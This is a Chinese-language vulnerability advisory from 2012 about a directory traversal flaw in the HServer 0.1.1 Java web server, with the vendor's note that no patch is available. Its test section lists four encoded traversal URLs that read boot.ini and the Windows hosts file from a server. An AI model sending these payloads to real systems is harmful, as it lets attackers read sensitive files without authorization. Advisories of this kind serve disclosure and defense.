HServer远程目录遍历漏洞
HServer远程目录遍历漏洞
发布日期:2012-01-05
更新日期:2012-01-06
受影响系统:
HServer HServer 0.1.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51286
HServer Webserver是用Java写的小型Web服务器。
HServer Webserver在实现上存在目录遍历漏洞,成功利用此漏洞可允许攻击者查看服务器中的任意文件,泄露敏感信息。
<*来源:demonalex
链接:http://marc.info/?l=bugtraq&m=132577808701640&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/..%5c..%5c..%5cboot.ini
http://www.example.com/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
建议:
--------------------------------------------------------------------------------
厂商补丁:
HServer
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.luizpicanco.com/index.php?s=hserver
评论暂时关闭